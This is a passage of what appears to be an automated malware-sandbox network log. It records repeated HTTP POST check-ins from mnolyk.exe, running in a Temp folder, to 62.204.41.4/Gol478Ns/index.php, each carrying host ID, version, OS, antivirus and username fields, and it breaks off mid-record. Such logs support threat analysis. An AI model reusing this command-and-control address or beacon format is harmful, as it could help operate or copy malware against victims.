Feb 7, 2023 20:04:15.304383993 CET	896	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
742	192.168.2.6	50467	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:15.494808912 CET	897	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:15.559283018 CET	897	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
743	192.168.2.6	50468	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:15.743630886 CET	898	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:15.807982922 CET	898	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
744	192.168.2.6	50469	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:16.004547119 CET	899	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:16.073323011 CET	899	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
745	192.168.2.6	50470	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:16.255517960 CET	900	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:16.320497990 CET	900	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
746	192.168.2.6	50471	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:16.488079071 CET	901	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:16.553069115 CET	901	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
747	192.168.2.6	50472	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:16.721903086 CET	902	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:16.785454988 CET	902	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
748	192.168.2.6	50473	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:16.958101034 CET	903	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:17.023379087 CET	903	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
749	192.168.2.6	50474	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:17.216226101 CET	904	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:17.282707930 CET	904	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.6	49795	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:11.503277063 CET	195	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:11.565735102 CET	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
750	192.168.2.6	50475	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:17.464492083 CET	905	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:17.529103041 CET	905	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
751	192.168.2.6	50476	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:17.709098101 CET	906	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:17.773282051 CET	906	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
752	192.168.2.6	50477	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:17.942955971 CET	907	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:18.007100105 CET	907	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
753	192.168.2.6	50478	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:18.186763048 CET	908	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:18.252865076 CET	908	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
754	192.168.2.6	50479	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:18.422959089 CET	909	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:18.484904051 CET	909	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
755	192.168.2.6	50480	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:18.662379026 CET	910	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:18.724710941 CET	910	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
756	192.168.2.6	50481	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:18.893120050 CET	911	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:18.956362963 CET	911	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.6	49796	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:11.751019001 CET	196	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:11.815969944 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.6	49797	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:12.000477076 CET	197	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:12.065249920 CET	197	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.6	49798	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:12.233155012 CET	198	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:12.297056913 CET	198	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.6	49799	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:12.467160940 CET	199	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:12.532263994 CET	199	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49726	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:52.825968981 CET	113	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:52.889281034 CET	113	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.6	49800	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
